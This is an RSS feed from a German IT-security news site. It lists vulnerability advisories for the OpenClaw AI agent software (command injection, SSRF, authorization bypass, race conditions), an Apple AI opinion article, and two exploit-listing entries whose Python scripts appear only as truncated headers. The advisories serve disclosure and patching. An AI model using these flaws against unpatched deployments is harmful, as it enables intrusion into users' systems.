<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=openclaw+3commas+cryptohopper+honest%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Fri, 31 Jul 2026 11:10:14 +0200</lastBuildDate>
<pubDate>Fri, 31 Jul 2026 11:10:14 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=openclaw+3commas+cryptohopper+honest%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=openclaw+3commas+cryptohopper+honest%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[CVE-2026-17458 | mf-yang openclaw-cn up to 0.2.1 Browser Control HTTP API agent.act.ts clickViaPlaywright server-side request forgery (Issue 562 / EUVD-2026-49053)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in mf-yang openclaw-cn up to 0.2.1. This affects the function clickViaPlaywright of the file src/browser/routes/agent.act.ts of the component Browser Control HTTP API. Performing a manipulation results in server-side request forgery.

This vul...]]></description>
<link>https://tsecurity.de/de/3695625/sicherheitsluecken/cve-2026-17458-mf-yang-openclaw-cn-up-to-021-browser-control-http-api-agentactts-clickviaplaywright-server-side-request-forgery-issue-562-euvd-2026-49053/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695625/sicherheitsluecken/cve-2026-17458-mf-yang-openclaw-cn-up-to-021-browser-control-http-api-agentactts-clickviaplaywright-server-side-request-forgery-issue-562-euvd-2026-49053/</guid>
<pubDate>Sun, 26 Jul 2026 14:29:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/mf-yang:openclaw-cn">mf-yang openclaw-cn up to 0.2.1</a>. This affects the function <code>clickViaPlaywright</code> of the file <em>src/browser/routes/agent.act.ts</em> of the component <em>Browser Control HTTP API</em>. Performing a manipulation results in server-side request forgery.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-17458">CVE-2026-17458</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-17457 | mf-yang openclaw-cn up to 0.2.1 Scheme navigation-guard.ts assertBrowserNavigationAllowed url information disclosure (Issue 561 / EUVD-2026-49052)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in mf-yang openclaw-cn up to 0.2.1. Affected by this issue is the function assertBrowserNavigationAllowed of the file src/browser/navigation-guard.ts of the component Scheme Handler. Such manipulation of the argument url leads to inform...]]></description>
<link>https://tsecurity.de/de/3695558/sicherheitsluecken/cve-2026-17457-mf-yang-openclaw-cn-up-to-021-scheme-navigation-guardts-assertbrowsernavigationallowed-url-information-disclosure-issue-561-euvd-2026-49052/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695558/sicherheitsluecken/cve-2026-17457-mf-yang-openclaw-cn-up-to-021-scheme-navigation-guardts-assertbrowsernavigationallowed-url-information-disclosure-issue-561-euvd-2026-49052/</guid>
<pubDate>Sun, 26 Jul 2026 13:38:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/mf-yang:openclaw-cn">mf-yang openclaw-cn up to 0.2.1</a>. Affected by this issue is the function <code>assertBrowserNavigationAllowed</code> of the file <em>src/browser/navigation-guard.ts</em> of the component <em>Scheme Handler</em>. Such manipulation of the argument <em>url</em> leads to information disclosure.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-17457">CVE-2026-17457</a>. The attack may be performed from remote. In addition, an exploit is available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple could ‘run the table’ on AI if it does things right]]></title>
<description><![CDATA[Looking ahead just a short time, Apple could hold a powerful position in AI where it most makes sense: deployment.



Not only will the company offer up its own AI models for the kind of tasks millions use ChatGPT to do today, but it will provide more sophisticated on-device agentic models to hel...]]></description>
<link>https://tsecurity.de/de/3694780/ai-nachrichten/apple-could-run-the-table-on-ai-if-it-does-things-right/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694780/ai-nachrichten/apple-could-run-the-table-on-ai-if-it-does-things-right/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Looking ahead just a short time, Apple could hold a powerful position in AI where it most makes sense: deployment.</p>



<p class="wp-block-paragraph">Not only will the company offer up its own AI models for the kind of tasks millions use ChatGPT to do today, but it will provide more sophisticated on-device agentic models to help users get things done through Siri AI.</p>



<p class="wp-block-paragraph">Apple also <a href="https://www.macobserver.com/news/apple-calls-its-new-assistant-siri-ai-at-wwdc-2026-gemini-partnership-now-official/" target="_blank" rel="noreferrer noopener">offers limited capacity for more complex tasks</a> through <a href="https://www.applemust.com/apple-commences-us-manufacturing-of-private-cloud-compute-servers/" target="_blank" rel="noreferrer noopener">Private Cloud Compute</a>, and, in partnership with the likes of Google in the US and Alibaba in China, the company is giving users a trusted conduit through which to access even more sophisticated AI services. </p>



<h2 class="wp-block-heading"><strong>Deeply deployable</strong></h2>



<p class="wp-block-paragraph">Critics can say it <a href="https://www.computerworld.com/article/4168225/wwdc-2026-how-apple-can-take-a-great-leap-in-ai.html">took Apple a long time</a> to get to this point, but they also seem to think the company has finally got the mix right with its series 27 operating systems. Arriving late to a party <a href="https://www.computerworld.com/article/4164979/apple-will-be-behind-on-ai-until-it-isnt.html">doesn’t mean you won’t shine once you get there</a>.</p>



<p class="wp-block-paragraph">Apple is also coming up the inside lane around frontier AI, with iterative OS and hardware enhancements that mean its devices become increasingly effective for <a href="https://www.computerworld.com/article/4016798/why-i-hope-apple-keeps-investing-in-on-device-ai.html">Edge AI use cases</a>, on device — no cloud service required.</p>



<p class="wp-block-paragraph">The company appears to be digging down into those use cases. Mark Gurman at Bloomberg recently predicted that <a href="https://www.tomshardware.com/tech-industry/semiconductors/apples-rumored-m7-ultra-targets-1-5tb-of-memory-and-blackwell-class-ai" target="_blank" rel="noreferrer noopener">future M7 Ultra Macs</a> will support as much as 1.5TB RAM, making these systems more than capable of running full weight frontier models in people’s offices, colleges, and homes. </p>



<p class="wp-block-paragraph">While that does assume the <a href="https://www.computerworld.com/article/4187825/the-trillion-dollar-ai-hallucination.html">AI-flationary memory market</a> can supply that much RAM at prices humans can afford, it is also true that people are already <a href="https://www.computerworld.com/article/4092162/apples-macos-ai-for-the-rest-of-us.html">running AI clusters</a> using off-the-shelf Mac minis networked over Thunderbolt cables. It’s no stretch to believe <a href="https://www.applemust.com/macweb-now-offers-mac-mini-cloud-clusters-in-east-coast-data-centre/" target="_blank" rel="noreferrer noopener">this will continue to be the case</a>, and that it will even broaden as the power/performance offered at the high end grows.</p>



<h2 class="wp-block-heading"><strong>What’s wrong with good enough?</strong></h2>



<p class="wp-block-paragraph">When combined with open AI stacks, particularly newly emerging varieties, Apple’s platforms should become leading contenders for <a href="https://www.computerworld.com/article/4074648/apples-big-bang-ai-moment-is-approaching.html">private AI services</a> and edge AI. Many business users will leap at the chance to offer their workers powerful, self-hosted, private AI services using one or more daisy-chained Mac Studios or Mac minis. The recent craze in deployment of both Macs to support <a href="https://openclaw.ai/" target="_blank" rel="noreferrer noopener">OpenClaw</a> instances shows they already are.</p>



<p class="wp-block-paragraph">Ultimately, these different slices of momentum mean I agree with <a href="https://podcastalpha.substack.com/p/all-in-can-ai-regulate-itself-stripe" target="_blank" rel="noreferrer noopener">investor Jason Calacanis</a> that Apple is in position to apply a great deal of pressure on OpenAI and Claude just by putting models on their devices. </p>



<p class="wp-block-paragraph">It’s also worth thinking about how people use AI today. How many of the queries made in the world right now constitute relatively simple tasks that could be transacted by on-device AI, such as the emerging new version of Apple Intelligence or even smaller LLM models running on device? You can even run <a href="https://9to5mac.com/2026/07/14/prismml-releases-bonsai-27b-claiming-first-major-ai-model-of-its-size-fit-for-iphone/" target="_blank" rel="noreferrer noopener">PrismML’s 1-bit, 27-billion parameter Bonsai</a> on an iPad using the Locally app, and that’s in the here and now.</p>



<p class="wp-block-paragraph">What happens? Pretty soon you’ll find people recognize that they can already run the vast majority of their AI-augmented workflows using services they <a href="https://www.applemust.com/morgan-stanley-its-when-not-if-apple-will-deliver-ai-on-the-edge/" target="_blank" rel="noreferrer noopener">have on their existing device</a> or can access on their on-prem Mac set-ups. And, of course, as people get used to running small tasks locally and larger tasks on premises, the actual space in which they need to turn to cloud-based frontier models <a href="https://www.computerworld.com/article/4195657/apple-is-prepping-for-life-after-the-ai-gold-rush.html">will erode</a>. That’s even as companies like PrismML work towards slimming down full-weight models so they don’t need to run on a server at all. </p>



<p class="wp-block-paragraph">“It’s going to be wild when people have unlimited tokens on their desks,” said Calacanis in a podcast round table discussion.</p>



<h2 class="wp-block-heading"><strong>Who has the most to lose?</strong></h2>



<p class="wp-block-paragraph">The current incarnations of AI felt like they came from nowhere. Most people weren’t aware of the technology until returning to work after the 2022 holiday season. Since then, the industry has proliferated with dozens of competing models, most recently including powerful but affordable frontier models such as Qwen and Kimi.ai.</p>



<p class="wp-block-paragraph">These models aren’t necessarily all as good as one another, but in many cases for much of what we do, we’ll find them to be good enough. That’s an existential crisis for some, as industry observers now think the inevitable pricing pressure means some services might have over-invested in capacity before finding any way to turn a profit.</p>



<p class="wp-block-paragraph">Those profit-seeking services are the ones with the most to lose as Apple extends its hardware advantage, democratizing AI access for all while providing platforms suitable for edge AI, on-premises AI, private AI, and even AI access using third-party services. (The need for the latter will shrink as the capabilities of the former get better.)</p>



<h2 class="wp-block-heading"><strong>Cupertino rising</strong></h2>



<p class="wp-block-paragraph">What does this all mean? While the industry remains young, it is already fragmenting. And striding through the dust of that process comes Apple, equipped with the hardware, software, and approach to build its business even as the enterprise of first mover AI services erodes. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32977 | OpenClaw up to 2026.3.10 toctou (GHSA-xvx8-77m6-gwg6)]]></title>
<description><![CDATA[A vulnerability was found in OpenClaw up to 2026.3.10. It has been declared as problematic. The affected element is an unknown function. The manipulation results in time-of-check time-of-use.

This vulnerability is known as CVE-2026-32977. Attacking locally is a requirement. No exploit is availab...]]></description>
<link>https://tsecurity.de/de/3693871/sicherheitsluecken/cve-2026-32977-openclaw-up-to-2026310-toctou-ghsa-xvx8-77m6-gwg6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693871/sicherheitsluecken/cve-2026-32977-openclaw-up-to-2026310-toctou-ghsa-xvx8-77m6-gwg6/</guid>
<pubDate>Sat, 25 Jul 2026 13:33:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function. The manipulation results in time-of-check time-of-use.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-32977">CVE-2026-32977</a>. Attacking locally is a requirement. No exploit is available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32982 | OpenClaw up to 2026.3.12 Error Message fetchRemoteMedia log file (GHSA-xwcj-hwhf-h378)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in OpenClaw up to 2026.3.12. This affects the function fetchRemoteMedia of the component Error Message Handler. Such manipulation leads to sensitive information in log files.

This vulnerability is uniquely identified as CVE-2026-3298...]]></description>
<link>https://tsecurity.de/de/3693870/sicherheitsluecken/cve-2026-32982-openclaw-up-to-2026312-error-message-fetchremotemedia-log-file-ghsa-xwcj-hwhf-h378/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693870/sicherheitsluecken/cve-2026-32982-openclaw-up-to-2026312-error-message-fetchremotemedia-log-file-ghsa-xwcj-hwhf-h378/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.12</a>. This affects the function <code>fetchRemoteMedia</code> of the component <em>Error Message Handler</em>. Such manipulation leads to sensitive information in log files.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-32982">CVE-2026-32982</a>. The attack can be launched remotely. No exploit exists.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32970 | OpenClaw up to 2026.3.10 gateway.auth.token/gateway.auth.password failing open (GHSA-qvr7-g57c-mrc7)]]></title>
<description><![CDATA[A vulnerability was found in OpenClaw up to 2026.3.10. It has been rated as problematic. The impacted element is an unknown function. This manipulation of the argument gateway.auth.token/gateway.auth.password causes not failing securely.

This vulnerability is handled as CVE-2026-32970. It is pos...]]></description>
<link>https://tsecurity.de/de/3693868/sicherheitsluecken/cve-2026-32970-openclaw-up-to-2026310-gatewayauthtokengatewayauthpassword-failing-open-ghsa-qvr7-g57c-mrc7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693868/sicherheitsluecken/cve-2026-32970-openclaw-up-to-2026310-gatewayauthtokengatewayauthpassword-failing-open-ghsa-qvr7-g57c-mrc7/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. The impacted element is an unknown function. This manipulation of the argument <em>gateway.auth.token/gateway.auth.password</em> causes not failing securely.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-32970">CVE-2026-32970</a>. It is possible to launch the attack on the local host. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32976 | OpenClaw up to 2026.3.10 Configuration /config authorization (GHSA-8jhh-jcqg-mj5p)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in OpenClaw up to 2026.3.10. This issue affects some unknown processing of the file /config of the component Configuration Handler. Performing a manipulation results in authorization bypass.

This vulnerability is cataloged as C...]]></description>
<link>https://tsecurity.de/de/3693867/sicherheitsluecken/cve-2026-32976-openclaw-up-to-2026310-configuration-config-authorization-ghsa-8jhh-jcqg-mj5p/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693867/sicherheitsluecken/cve-2026-32976-openclaw-up-to-2026310-configuration-config-authorization-ghsa-8jhh-jcqg-mj5p/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. This issue affects some unknown processing of the file <em>/config</em> of the component <em>Configuration Handler</em>. Performing a manipulation results in authorization bypass.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-32976">CVE-2026-32976</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32921 | OpenClaw up to 2026.3.7 toctou (GHSA-8g75-q649-6pv6)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in OpenClaw up to 2026.3.7. Affected is an unknown function. Executing a manipulation can lead to time-of-check time-of-use.

The identification of this vulnerability is CVE-2026-32921. The attack may be launched remotely. There is no exploit ava...]]></description>
<link>https://tsecurity.de/de/3693866/sicherheitsluecken/cve-2026-32921-openclaw-up-to-202637-toctou-ghsa-8g75-q649-6pv6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693866/sicherheitsluecken/cve-2026-32921-openclaw-up-to-202637-toctou-ghsa-8g75-q649-6pv6/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.7</a>. Affected is an unknown function. Executing a manipulation can lead to time-of-check time-of-use.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-32921">CVE-2026-32921</a>. The attack may be launched remotely. There is no exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32988 | OpenClaw up to 2026.3.10 Temporary File toctou (GHSA-mj4p-rc52-m843)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in OpenClaw up to 2026.3.10. Impacted is an unknown function of the component Temporary File Handler. Executing a manipulation can lead to time-of-check time-of-use.

This vulnerability is registered as CVE-2026-32988. The attack nee...]]></description>
<link>https://tsecurity.de/de/3693864/sicherheitsluecken/cve-2026-32988-openclaw-up-to-2026310-temporary-file-toctou-ghsa-mj4p-rc52-m843/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693864/sicherheitsluecken/cve-2026-32988-openclaw-up-to-2026310-temporary-file-toctou-ghsa-mj4p-rc52-m843/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. Impacted is an unknown function of the component <em>Temporary File Handler</em>. Executing a manipulation can lead to time-of-check time-of-use.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-32988">CVE-2026-32988</a>. The attack needs to be launched locally. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32920 | OpenClaw up to 2026.3.11 Workspace OpenClaw/extensions/ inclusion of functionality from untrusted control sphere (GHSA-99qw-6mr3-36qr)]]></title>
<description><![CDATA[A vulnerability was found in OpenClaw up to 2026.3.11. It has been declared as problematic. This impacts an unknown function of the file OpenClaw/extensions/ of the component Workspace Handler. Such manipulation leads to inclusion of functionality from untrusted control sphere.

This vulnerabilit...]]></description>
<link>https://tsecurity.de/de/3693862/sicherheitsluecken/cve-2026-32920-openclaw-up-to-2026311-workspace-openclawextensions-inclusion-of-functionality-from-untrusted-control-sphere-ghsa-99qw-6mr3-36qr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693862/sicherheitsluecken/cve-2026-32920-openclaw-up-to-2026311-workspace-openclawextensions-inclusion-of-functionality-from-untrusted-control-sphere-ghsa-99qw-6mr3-36qr/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.11</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the file <em>OpenClaw/extensions/</em> of the component <em>Workspace Handler</em>. Such manipulation leads to inclusion of functionality from untrusted control sphere.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-32920">CVE-2026-32920</a>. An attack has to be approached locally. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32971 | OpenClaw up to 2026.3.10 clickjacking (GHSA-rw39-5899-8mxp)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in OpenClaw up to 2026.3.10. This affects an unknown part. The manipulation results in clickjacking.

This vulnerability was named CVE-2026-32971. The attack may be performed from remote. There is no available exploit.

The affected component ...]]></description>
<link>https://tsecurity.de/de/3693861/sicherheitsluecken/cve-2026-32971-openclaw-up-to-2026310-clickjacking-ghsa-rw39-5899-8mxp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693861/sicherheitsluecken/cve-2026-32971-openclaw-up-to-2026310-clickjacking-ghsa-rw39-5899-8mxp/</guid>
<pubDate>Sat, 25 Jul 2026 13:31:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. This affects an unknown part. The manipulation results in clickjacking.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-32971">CVE-2026-32971</a>. The attack may be performed from remote. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32917 | OpenClaw up to 2026.3.12 Attachments os command injection (GHSA-g2f6-pwvx-r275)]]></title>
<description><![CDATA[A vulnerability was found in OpenClaw up to 2026.3.12. It has been classified as critical. Impacted is an unknown function of the component Attachments Handler. The manipulation leads to os command injection.

This vulnerability is traded as CVE-2026-32917. It is possible to initiate the attack r...]]></description>
<link>https://tsecurity.de/de/3693834/sicherheitsluecken/cve-2026-32917-openclaw-up-to-2026312-attachments-os-command-injection-ghsa-g2f6-pwvx-r275/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693834/sicherheitsluecken/cve-2026-32917-openclaw-up-to-2026312-attachments-os-command-injection-ghsa-g2f6-pwvx-r275/</guid>
<pubDate>Sat, 25 Jul 2026 13:12:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.12</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the component <em>Attachments Handler</em>. The manipulation leads to os command injection.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-32917">CVE-2026-32917</a>. It is possible to initiate the attack remotely. There is no exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32916 | OpenClaw up to 2026.3.10 privileges assignment (GHSA-xw77-45gv-p728)]]></title>
<description><![CDATA[A vulnerability was found in OpenClaw up to 2026.3.10. It has been rated as problematic. Affected is an unknown function. Performing a manipulation results in incorrect privilege assignment.

This vulnerability is known as CVE-2026-32916. Remote exploitation of the attack is possible. No exploit ...]]></description>
<link>https://tsecurity.de/de/3693831/sicherheitsluecken/cve-2026-32916-openclaw-up-to-2026310-privileges-assignment-ghsa-xw77-45gv-p728/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693831/sicherheitsluecken/cve-2026-32916-openclaw-up-to-2026310-privileges-assignment-ghsa-xw77-45gv-p728/</guid>
<pubDate>Sat, 25 Jul 2026 13:11:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function. Performing a manipulation results in incorrect privilege assignment.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-32916">CVE-2026-32916</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.2-beta.5]]></title>
<description><![CDATA[openclaw 2026.7.2-beta.5]]></description>
<link>https://tsecurity.de/de/3693721/downloads/v202672-beta5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693721/downloads/v202672-beta5/</guid>
<pubDate>Sat, 25 Jul 2026 11:23:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>openclaw 2026.7.2-beta.5</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw tools.exec.safeBins < = 2026.2.22 Remote Code Execution]]></title>
<description><![CDATA[Topic: OpenClaw tools.exec.safeBins < = 2026.2.22 Remote Code Execution Risk: Low Text:#!/usr/bin/env python3  # Exploit Title: OpenClaw tools.exec.safeBins < = 2026.2.22 Remote Code Execution  # CVE:             CV...]]></description>
<link>https://tsecurity.de/de/3693405/poc/openclaw-toolsexecsafebins-2026222-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693405/poc/openclaw-toolsexecsafebins-2026222-remote-code-execution/</guid>
<pubDate>Sat, 25 Jul 2026 10:04:25 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: OpenClaw tools.exec.safeBins &lt; = 2026.2.22 Remote Code Execution Risk: Low Text:#!/usr/bin/env python3  # Exploit Title: OpenClaw tools.exec.safeBins &lt; = 2026.2.22 Remote Code Execution  # CVE:             CV...]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw <  2026.3.28 Discord Text Approval Authorization Bypass]]></title>
<description><![CDATA[Topic: OpenClaw <  2026.3.28 Discord Text Approval Authorization Bypass Risk: Medium Text:#!/usr/bin/env python3  # Exploit Title: OpenClaw Discord Text Approval Authorization Bypass  # CVE: CVE-2026-41303  # Date: 20...]]></description>
<link>https://tsecurity.de/de/3693403/poc/openclaw-2026328-discord-text-approval-authorization-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693403/poc/openclaw-2026328-discord-text-approval-authorization-bypass/</guid>
<pubDate>Sat, 25 Jul 2026 10:04:22 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: OpenClaw &lt;  2026.3.28 Discord Text Approval Authorization Bypass Risk: Medium Text:#!/usr/bin/env python3  # Exploit Title: OpenClaw Discord Text Approval Authorization Bypass  # CVE: CVE-2026-41303  # Date: 20...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34505 | OpenClaw up to 2026.3.11 excessive authentication (GHSA-5m9r-p9g7-679c)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in OpenClaw up to 2026.3.11. Affected by this issue is some unknown functionality. The manipulation results in improper restriction of excessive authentication attempts.

This vulnerability is identified as CVE-2026-34505. The attack ca...]]></description>
<link>https://tsecurity.de/de/3692796/sicherheitsluecken/cve-2026-34505-openclaw-up-to-2026311-excessive-authentication-ghsa-5m9r-p9g7-679c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692796/sicherheitsluecken/cve-2026-34505-openclaw-up-to-2026311-excessive-authentication-ghsa-5m9r-p9g7-679c/</guid>
<pubDate>Sat, 25 Jul 2026 02:24:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.11</a>. Affected by this issue is some unknown functionality. The manipulation results in improper restriction of excessive authentication attempts.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-34505">CVE-2026-34505</a>. The attack can be executed remotely. There is not any exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
